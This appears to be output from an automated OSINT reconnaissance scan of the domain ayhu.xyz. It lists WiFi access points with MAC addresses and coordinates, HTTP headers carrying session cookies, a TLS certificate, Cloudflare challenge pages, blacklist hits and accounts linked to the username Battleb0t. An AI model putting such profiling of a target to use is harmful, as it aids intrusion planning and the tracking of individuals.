| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 2WIRE522 (Net ID: 00:01:E6:93:CB:2D) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | W4B3P<]00D^20&51%1C35&6H'%***%Ph (Net ID: 00:06:66:2A:52:5E) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:55:15 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Set_Cookie": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Set_Cookie": ["XSRF-TOKEN=eyJpdiI6IkpHMTdmeTU3ZDYwZnVJOEZ6K1lCMmc9PSIsInZhbHVlIjoiMXA0Z1VsZWxwK2dDVkY4Sk1IWVdXKzNzaU8zM1VPcytNUE9HZEtmVkpmY0tRQ3BMczIyMjR4ZU9VWFdDRTRVNG94cU5KbXFkdnA3L3dVdEo3cy9YYTgvOWdtdHpISktCOWlOa0UrWG1LZWtPL1lVWHFsOEhhRjFaZ3dYZDZiU2siLCJtYWMiOiJiYzUwNmFjZjdkMzVlMzczZWI5YTJmMzM4NWFhOGYwYTA0Y2VkNmJlZWI5YmZhODViNDMwMjNjYTY5NjI1NWIyIiwidGFnIjoiIn0%3D; expires=Thu, 11 May 2023 19:34:47 GMT; Max-Age=7200; path=/; samesite=lax", "laravel_session=eyJpdiI6ImdUVzFCME5hTHdVNjIvVHBRWjNUU2c9PSIsInZhbHVlIjoiaThZSTFKV29BNjc2ekZNZVRHdkNXTXJvVlVOZCtNemFRSlo4RFlXZ0lZR1pyV1FwMmp4K2ZmLzdmUEtBM0JTTjNTQmhnNG9uVlhabFJkUklRRkhVZmkrbVlnb1BZelR2K1VLNUkxdUhQL1d6bFBpSFk0QUJ4TzNDcjA5ZktLcjYiLCJtYWMiOiIxNzk1Nzg4OTNkYWJhNjk4NzRmM2E4Njc4ZDY3ZWE2M2Y2YzQxZTIxMTZjODQ2OTZiMDdmNWE1OGJjY2YyNzc0IiwidGFnIjoiIn0%3D; expires=Thu, 11 May 2023 19:34:47 GMT; Max-Age=7200; path=/; httponly; samesite=lax"], "Server": ["nginx/1.18.0 (Ubuntu)"], "Connection": ["keep-alive"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "Cache_Control": ["no-cache, private"]} | 165.232.113.85 |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-l.github.io]
https://www.openphish.com/feed.txt | 0-l.github.io |
| 2023-05-12 03:03:17 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 14 04:53:54.573 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:4D:1F:4C:53:A2:2C:16:48:36:E0:
E3:59:95:10:4D:AC:DA:52:1A:46:2E:19:E7:DA:3A:94:
30:B2:B6:AF:0D:02:21:00:B0:C6:A1:4B:9B:FE:4E:59:
8A:FC:46:1B:75:55:34:A2:8C:0A:51:5A:D3:3F:C3:63:
FB:4F:E2:E6:C3:EE:2C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 04:53:55.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:ED:EC:3B:A7:32:A8:30:D7:4E:2F:1A:
02:02:BB:D6:DD:30:69:59:5A:E6:97:33:2E:BA:E1:81:
BB:CB:99:00:02:21:00:D4:02:BD:53:9C:06:85:84:2D:
D9:33:CD:60:59:DF:DC:44:B2:4C:A9:FF:8D:9F:75:90:
F0:18:EF:92:21:63:F2
Signature Algorithm: sha256WithRSAEncryption
47:e5:47:8a:5f:84:37:c0:02:97:35:aa:f2:b0:78:40:e7:a7:
4b:75:22:0b:a5:fb:81:51:db:7f:48:05:05:cf:56:dd:69:5f:
ff:a9:81:35:df:0e:37:63:bc:cf:e9:04:35:2e:93:0d:cb:ec:
3b:29:06:9b:cc:f9:88:91:0c:0c:6c:50:03:1e:f2:37:b0:d2:
3a:51:bd:ea:2e:d4:c1:14:23:12:fa:23:c6:0b:23:6d:59:64:
37:c1:19:f0:fc:0a:70:3f:3e:a2:ba:a9:1b:1a:a0:9a:c0:a8:
92:f0:f6:cb:41:69:32:ab:f7:f7:32:b0:fb:af:db:e0:fa:c9:
05:b6:49:21:d5:48:07:23:f4:14:1e:e6:16:03:17:40:fa:84:
7e:34:ed:67:8d:2b:63:9c:57:50:bd:40:57:13:4f:56:ea:0d:
6b:4e:d6:08:40:d4:cb:ee:ab:df:5c:7f:66:51:e8:c5:80:2c:
36:f3:57:45:b8:4e:cf:13:55:68:05:43:37:5d:53:06:76:78:
12:7a:43:6a:d4:09:c5:e2:b2:a3:69:4f:a7:d9:91:58:86:8d:
48:37:1c:60:ed:eb:48:b9:bd:5d:b1:4d:ac:af:9b:5b:a2:ab:
a6:a4:49:fb:f3:b8:d3:3f:2c:d0:72:37:b1:a4:ae:8b:5e:82:
84:78:32:a1
|
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.178): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:23 | Web Content | No | Web Spider | 3 | 0 | 4 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f6071cb5443bc')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="IeJGNK1NlgODfmY5lM_CSOUsGpZRJayFri_EMqB7p9E-1683860063-0-AX4CepkLIrJBlYjsLY8SxaK3uwNGfYi_cI78cSgODaKEdDdhGruTJdLNKHipCAas1yRDoJa4jk3w7x3p7ckhzOJuKfeCo8jNUnP70adNIU5dZKa8JiOWBoI9SYK5Q_oq1Eks42yH_Pz5BuZ0QF6ODH2_k4pUMdjxKhGMZCyDKNM52sbeTu0IU1Z9_e1tCtOuH9J1aFZ2tonlXDc4g9zbIux7ExZ49kbKhnzKgiWBhIHUBpMYeWpuSJ_4qCfMlTT-uy5MHKpoVHLVBmCsQ5mELCsRXClDzOjpDkTqbSfAbh8hd0u6E9AsLVFq6mkA8uYgAs4nEqsUUv46GTcwvbzUbkKc1QJ8A2k0LYiOtqEyNozJ7I--u1pFreN-cf0BqBu1bjzjmjk9Ufw9C0rNxE7G3P6fqZnucT3KAI7GF68B4SHiO-kTUnp1udVECKZapa-19gQJJJtF13C6VjJjrQRVkch5xapdVTcSAJFESEO-EAMR9hDp7y8V-5vaHn6SIRKHs78Flbh2RF_P6lv_MAE36XjAyTTiidlaFqpS1ZnkznV7tCrGaYKNvXxibZ3SNtIzHvSSCizS-Sm2WncoqNtWFQZw4MSwC5gehOZvyL9OAj1SA9fWTQ-bfiW7LrZlzCWCJLIZUGG9pJVYCgum_TAJJVGfiljuO91NZvVvNyIgtAepbw2YAdNPwZ3YrRDL_1Un5U1kxz28HuDFJsvpLlTZSNRhPXl4BIx30MOZx9T7SUFWsCGh9uDL2bDPiBh0LSwqszBX0SLNJRo1MhT7IXGB7zy1gfVfFqqb3W0mfVcaymGtm5dqhUdBPRlb4wd_5_BMrKEUeZE1d8HDjjoyYLhvv36SD_5wRCbXxsfCdK2do3aGeM7O6LtZhGR0RuwOPFtRToqLDpM6HnWkxfbvRwTWbQt3gNfo6RJeaXs42GfGC6vMhv6-Zpdazh2C2qr1j5WGxsjVqAAnZQgtB_uAAZyLoW1Egawj2Dc9S-5JYlq2p44Cqz8kfn_HZzhJUPbd4OlAseBQZQfvTsxwQ8yBZFjNQTY6QE_0SDhUH44IwsfVzyg_qg2EOGimekLuWDzCGVBFHthTUHY_Uucg55yA_sEwBbcPwi19lZdxlJ7Akcrfm9Q1xTPYWqd3yg8TDkXwERtBie2ALa_sZMgXe5lFShstzVHZMFcNmZZ_Glu5XNCQGzZM4IALYOXDtzDzNfENL_KkCst225-oNpK1Rzcel6A6qrg383feNMfsfhR4f-t-0gjSgQcGjcMVuJSy33wzj3MyKMSAUAn1H3AU4KXx5l9gYHyPt3K2hXsw8kpaOC5iz5-tYdad463GleEPqMnQXyYze0-F-Kwpfaw0OW4xcwFgpJ7lUIa_Uo9RY1JgFEsKioyqNmIqHv90TnhF2xXyZtqCIT2zmPgDYc3GYmtDVDX3JH3IZ4Ue_9zw8eTUmmNzSLvHF-5-Jv1PvIxzwhsHdZ-9Y8a5xpT_YJ3ApVgxhBxQ9P11Ef3die91V-gWJ9blK7JyrAR97qvn0MVCh6Ipd0gUwoYP19FqAzVItOvoLt6KwAJ_P9BHXzn9V-Qn-K8E2u451f3eK9LuNMBNNeHTIZgwhKeDRKi_7YqSZEtSZBhservvl6AG5D792DbSptVg8teok3yfFJdmbmsVVtq_xMiFDR-JbWee4Xq5OGPEw-qzY3kVcZ3JGSH21pWSbawncJ1pZkYh_Y8uqWXqK_LHYCf1eZ4giUZOc1qNXVqD_66D8diNIgnlP3oGUHrBgTMOfZxq_Uhi6OAhZ7SG3lBy8EfeOsdCdZ3k3gkwd2BrqWGkSsiJCJw71aRSSLzklcMwO0t4rEGUoCt0P2QnnyFhBnAPmmU7bxfnvOSfNl67KcA670pAvXnjK5gtdmpWFLEQTKLiAxus6a1J55sB1jh2yyAgp9gU2TTlKH22JllQWbKYrEsbRrNjjaWTpuGgMUZEhABzykAV0_5Ryf5b1Iu8aB_yUQXLfxLOISB2J16hIkX9JBFDhB-K2iwT5AigiDsDn3kKx7Yn_RfRJoS2pRLWMZrIYAvnVYgYm9y81edopks9rnm7ZmUwgzO-G3g49daHSOyerkiJ0r3J8Okw4DK6PeI9iYnnJ3PuZHAUjE4lk_8MrIhAc4uYX4K1o-9Ke-xbpTbnl7jmdG3Gm-3L29y4tiQBKGjYgOtRk8-ysAEQVxg_UH3seGqQfmukY-uxgmHTqDedEdiiNc4iffnQwUfSPCDaUaRSMt4-JL4MYFn2fdPc4VcXOX79Z268m3iG4CyIoyIieiZJxKq5Fytf17H7DrAwzAK-7_cWORr2s0UVl6ksSgbwFTpGy4N__sJOF51dtXEfVEmWHx_Pzkw3X_pi-v5lATWE8lvwSB-TSiJYfQSJHSYYT6HXfaT1w6X76n4kq-ZrPPxvvJoJiND7W8ZhQjzgNr36p7jhZIQMiMAEzKgTQ4vmitfYqD4w00ar7uYe4W9UaptpqutZe32-rsetHK4f8sKgJ3CeKwcgiEQOluwAYjS5sFZ43pJ1k3hVEeYe7pLW">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '15631',
cRay: '7c5f6071cb5443bc',
cHash: '381065269fdd378',
cUPMDTk: "\/?__cf_chl_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'q4f4pOzDOU+B6AF/zMNZTtfQUbZJdschTcFNDOWKy7up/+mqaf8truQ2KKjt/rj9tsUJvHCPMl5JvfNuCtkhZqw35DYnRx8YzO+NZjtA29VORnsHbyexmRukxXhkj1aUs/dhLsS5lOlcBynQLv3fAojBSMTo2irKEDIydphKjwI16wTgar4SzVlH066rSHCeJ2lW9V/EzSyT6l7asFs9WGN+Z8UjlTPKJ0lqdL3pvuxM1sycw7k1OEGh4TEFk1Zi1Tm1qR0tz33CqvHEhqWe/r3r5anajxc1h5XZ6KT0dxZzvkI9kjdFbs/PTqH3OLzFqntntP1dLIyJxruw2vIIQVb+EG/QQudh3iW9ZP10B65ViMqC73osReO89Glx14C4rnxvY8OJhiGTBOtdj00LRx9JN+pPLlnlA0YFKm2eKJVsXMpv+GW4A4i2NhsMxRv/+0WJcnA98Fw7X4UhvaDcRzqVlcJrpcoGpX4b3ekLBWbuGttHibBiFb8Dx03xS+AEGjoHAFPYd/6bzsrrE8hANuLdxtuQ9vdmh2M9tUxqXUEa48P3yZ8gGXIpNOoU9aBv',
t: 'MTY4Mzg2MDA2My4wMDEwMDA=',
m: 'ku7Iuu8p9xCCueKE3I6e30hCT4pHjE58URs2150Qfj8=',
i1: 'MsbaNnnSVdv9s0jxu/qFPg==',
i2: 'D5L567ziFL3S1185dlxV3g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f6071cb5443bc');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f6071cb5443bc';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| https://www.ayhu.xyz/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU |
| 2023-05-12 03:38:35 | Blacklisted Affiliate IP Address | Yes | UCEPROTECT | 0 | 0 | 4 | 0 | None | UCEPROTECT - Level 2 (some false positives) (46.101.229.63) | 46.101.229.63 |
| 2023-05-12 03:43:57 | URL (Form) | No | Page Information | 0 | 0 | 5 | 0 | None | https://ayhu.xyz/lol.html?__cf_chl_f_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c5a3bb81a1b')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="e35Zj8G5BDk9XldXhqgKMMl4m4jJjyX9hPpRt8lgb3o-1683861861-0-AeRvD12zRrpKT1Vj_NZpuXTYPY0T_C-IsEnAR9u2dCvcdsLy9Sv3iw7wV_fgwkqNl3iHxdj5qFwNZJL3xkB-iwW9vjUdMNxMyhnqv8JlscfNtie9SAcppGbOk7uCBiZIQLa1SBVNw6UUv-_a_FXFD2296FJ4KrNIS6arC6VFPDD30uM_354WVFgyW4mKtrSpYK5InwieJ1Vkv6ZxoCDhBRMhNxgPpigNP0QmWXw8y1_k8lflCwo_Q9K8uZ_qtQFf0Gfd14ZLuORqP0m48rgXZsNXk2d82Mm2SMemmjVviG7PuPUL1CbnB3WfSK2OQGeY4U-Gy7kSdq7i3_ymV00fkl4RBJdkPDOtsR2eeN44cG0QzvhUzJu9a18Wx-JBgeMkCDDp2c6FvebNEOQydvCZrys93XZSGdta0GBiBfCz0DM6AFXJXoguOORHg7MOd62eoxeeua6hY1HFOifFbgHz4R4_F4geEyT8xPiS9kLqmv-8Tv9wFT23J38aRv3VS8KGL7JX_pO7KJv7qjQiIN2XDIN1kP01EuKi5fpoFbmvumK_aQpspEPJd-oYkv6g3z8upJ_i8gMQOJzdPMV462qdkEt72KoSPvIxKpy4bKNXJwJjWy3MhsDm6o8-oFAI7dOznlN5m1idwbZgvsnclXbdkqJhXPQYzxjKdzlT7hyQKmtmMash-U3aTKSIpDEKkTstu-cs5rTf__9DuNB2pVPrKXIFuY7EwlrjB6j_0UJKavfBfT6h3NsKR3qKMg-rGVo2RSQdsEOud7Hh5F0cMs0nCAAWGTq86XwfC81O29W1K2i6OalWYJiW61x1Nv_qs72KoX0_Mpn3amoMA5KS1vGI6mPUPMiOwHSI0cRgqEERjtVjkE3-TwMesGkKvz-Aw2gGE9OL21frfN9JEzkR172OTICxrUfc7caDwzr9D9_NePtArl9cLDKFHEvxIxzgioPuODDLvyAfvi0dPWiWhMq7WkvCuoWovUiUA253wYEf7M9x4gD8lnc3kaUCBX9tFmIajIXhsaHhaKh_ysHvt7SDv4HQuHFmdW_PTHj46eP5odywpuZGDTSuWK7SWH7u71n7C_Ae4KUmVvgKAwroZ_dlv8I2ROpq-QoxjIwoWtmm2DsGljOITbn0msRXnKPyZMK8B7bxqx0Tk0lwfAxw5qFIfx9cKTkyEKNgMaJHKVRsdCxtQMpTYYbYCTs7ecYaFA-cfa8pDUJO-vS3eg6mjgEiRw-8bm1dPWtPUv2T1GYeSsTkWX7p26b8BfAn4XpyF65-516ZnQxFqk_LYA1aiczQzQWdLb1NuFpyAlTJVRij048j5uSY5WFvTrmsh7xjoZ2Z46DkwHtY4crfRZm3SD6Mg_03vOiI68rC6vzz6BqdsamaXqvoFcnUbGnDDjkCNPCk0I7LyG6AFbm_EwgFVB9gZOJPVWeWKxdCcEWIQQOyO_AqVnN-wyzH0S5fWbIjXusPp_qMzz38MsJyGlFbc7GOuh6S4SdpuQewqWPsqFDGHPGtQUEKXIDpP7weMLUYzqItqb4vPv3n4sxn1GsE-qNs3lpwxVrc1SL_ssnb3-_jfGgVSpkOmJliBGGmoH-AatJn35K3t_jno9HyCYJLmz1rZkbI33XoOACdRBNvladuDXSHE4m8J_n-NLMdDcqru4xU65kcr9OibRXR4hHHwc3rYYFV9kMj9KFuctQB10AWFL0_n3yW8Zlh4cik5rYLuGKboFr2i4pY9ykLSq7sms7Qe3oXXbRcmeWxKtL0NlB6gk_PWz-AAqtF3sr5sdva-7sRfyfrgrQxpiH5_wMb5DPqczx1O37xCMTLyF6YhMXn4ABmLQ-mt-EMWYX-tkGM85skgM2leXXJlv6HTAp-riDNoZ3OMVT4KeKIc6AIi8pOLxrJ9jD5oVgtqxZff2ZqlinhLXHPSVtkPU-H6FAHinPrzSf3uH_Q3H0UuvzybBwb61Kz9xfOtHBkP2nWMCU86xpSbO4c6VIi3roOnQLOncMey4LehldRzG60kvAcLOIIzsotkC6A0TzBdXW6h8WnOc98kvqVlyyluYDZoGL2sgBQP5iT8LeZ1GiKa6nuzXWAIZArCXDfvtsaNftRUiJODl-iLsalLmXB287qXlXnC-Sqn-VkYBIG1c0SYjAXzvc-MH1JJfTmtb7X2x-mXdkkqwoy16YRiEGxdDA84vt_3-1PJIVkwQFdJL01areTvrgmeIqm94L-DFciyanQyUBPitgHcxMUsm51YpB6KDWM18BLL4ehHRO7XO7TX_IIKdZiHbwQcPJ8FX04IKxS2S5Y3q_h8S65tynRA7TtY9YDIyDgHWfsgLSoL1L6GRBWm_cX_GqkdNtINyYbvrEjvcbcBhRdYEvzv7ySe_t5eEL9DPxXMRgGUTSk5GXudJNBbnpRMcYsT7qBIns8TOaWZIAFXnDbumx2Yzf2QUY6Xnq_tYLe1hwa_1BstafWXYwwQNC50mTlgJK1S5YWtg1SKoybbC9x5fcZ1N-_oCRgLtaxFqIZMUnOoV0u2hpdcXGPpNrOH3SR">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '70037',
cRay: '7c5f8c5a3bb81a1b',
cHash: '1cbb584e4678a4a',
cUPMDTk: "\/lol.html?__cf_chl_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'QLdIKmVk90yEleUYFE8hq2th+l+jM4Uner6m/PqgQtgOm/j9Wu0B6Nwve/VIS31m9W0lb1V8I9RlPI3LD6ZpGikA+cl1xSe9juPQwbg/Khf2e9vfPpLKN0X7UvbusnivZuKA6TGjro8M7MljUWp3taWc0NTFEoxbvZYXtf23gnOsGXD0P3fio4y3xX1t0tyqoIYWkX6yVqHvCXS1I5Mc00CNY00FBcI/7efFMNVH6yXhbtO4DyojjSzFMA05WgLv1NMq/SwjeKgTF2UQjV1ScyP6xlwF4X/SOwW0/jc9ATHtwcZox/DXcQhTbYvzRGwtclm7F8sB4NPhEbop1gXy97S6V5xE84j90At9GihMuWgC3j9pOQviCNo3sewEE1wcCPBex3qLyb9lbO0GI3TZ/lO3ce3eYjSncgsTFzLP72SeeH7Cmkp5RZNQKUNY6KsNqv0SoqAADgpekKlGL1tqVOG6O7u3V3DisK9MR45AkotpTXq8Qr9XZQjfqaCO5Yfbn8lV1zfjI7l05/9wUrB6DYoT7pc7b3AgDm+BZdc44QE9FZKV/xPKQptYvP3Z+ZLT',
t: 'MTY4Mzg2MTg2MS40NzgwMDA=',
m: 'l9x6fYD43AkOSli+eEX3TiMPXRiBndCq0G/Dpt1PKp4=',
i1: 'nuJed/J938+IZsnq9K0k2g==',
i2: 'LCpeQRd016F0btwfkm2M8w==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c5a3bb81a1b');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5a3bb81a1b';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | giters (Category: coding)
https://giters.com/Battleb0t | Battleb0t |
| 2023-05-12 03:17:44 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | MCName (Minecraft) (Category: gaming)
https://mcname.info/en/search?q=_BattleB0t_ | _BattleB0t_ |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Interwrx2 (Net ID: 00:02:2D:A8:80:99) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0066cc.github.io]
https://www.openphish.com/feed.txt | 0066cc.github.io |
